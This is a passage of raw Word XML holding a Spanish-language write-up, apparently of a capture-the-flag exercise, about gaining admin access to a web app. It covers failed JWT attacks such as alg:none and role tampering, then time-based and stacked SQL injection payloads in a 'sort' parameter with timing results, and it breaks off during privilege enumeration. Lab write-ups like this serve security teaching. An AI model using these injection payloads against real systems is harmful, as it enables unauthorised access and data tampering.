          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>rtavarez</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> tenía el rol </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, pero su campo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>password_hash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> era </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>NULL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>, por lo que no era posible recuperar una contraseña desde ese registro.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>4. Investigación de la autenticación</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">La aplicación utilizaba tokens JWT con el algoritmo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>HS256</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Un token legítimo de usuario normal contenía información equivalente a:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>{</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"username": "chef_test_7391",</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"role": "member"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Al solicitar </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/api/admin/flag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> con un JWT de miembro, el servidor devolvía:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>HTTP/1.1 403 Forbidden</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>También se probaron otras técnicas:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:hanging="360" w:start="709" w:end="0"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Manipulación del campo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>role</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> durante el registro.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:hanging="360" w:start="709" w:end="0"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Tokens JWT sin firma mediante </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>alg: none</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:hanging="360" w:start="709" w:end="0"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Intentos de recuperación de la clave JWT.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="200"/>
        <w:ind w:hanging="360" w:start="709" w:end="0"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Consultas SQL para modificar directamente usuarios.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Ninguna permitió acceder al panel administrativo.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">El registro ignoraba el rol </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> suministrado por el cliente y creaba usuarios con rol </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>member</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>5. Descubrimiento de la vulnerabilidad decisiva</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">La investigación se concentró en el parámetro </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>sort</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Se realizó una prueba temporal utilizando </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>pg_sleep(3)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>(SELECT 1 FROM pg_sleep(3))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Resultados observados:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="12"/>
        <w:tblW w:w="3393"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2607"/>
        <w:gridCol w:w="786"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2607" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:start w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:end w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl/>
              <w:suppressAutoHyphens w:val="true"/>
              <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:kern w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="es-ES" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="es-ES" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>Prueba</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="786" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:start w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:end w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl/>
              <w:suppressAutoHyphens w:val="true"/>
              <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:kern w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="es-ES" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="es-ES" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>Tiempo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2607"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Consulta normal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="786"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0.141 s</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2607"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 xml:space="preserve">Consulta con </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="es-ES" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>pg_sleep(3)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="786"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3.181 s</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>La diferencia confirmó que la base de datos evaluaba la expresión SQL inyectada.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Posteriormente se investigó si podían ejecutarse varias sentencias separadas por punto y coma.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Payload:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>username; SELECT pg_sleep(2)--</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Resultado:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>HTTP 200 | Tiempo 2.163408s</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">En contraste, una prueba equivalente mediante </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>q</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> devolvió HTTP 500 sin demora significativa.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Hallazgo crítico:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> el parámetro </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>sort</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> permitía ejecutar sentencias SQL apiladas, abriendo la posibilidad de ejecutar operaciones de escritura.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>6. Enumeración de privilegios</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Se consultaron los permisos de PostgreSQL mediante </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>has_table_privilege()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Resultados:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="12"/>
        <w:tblW w:w="2426"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983"/>
        <w:gridCol w:w="1443"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="983" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:start w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:end w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl/>
              <w:suppressAutoHyphens w:val="true"/>
              <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:kern w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="es-ES" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
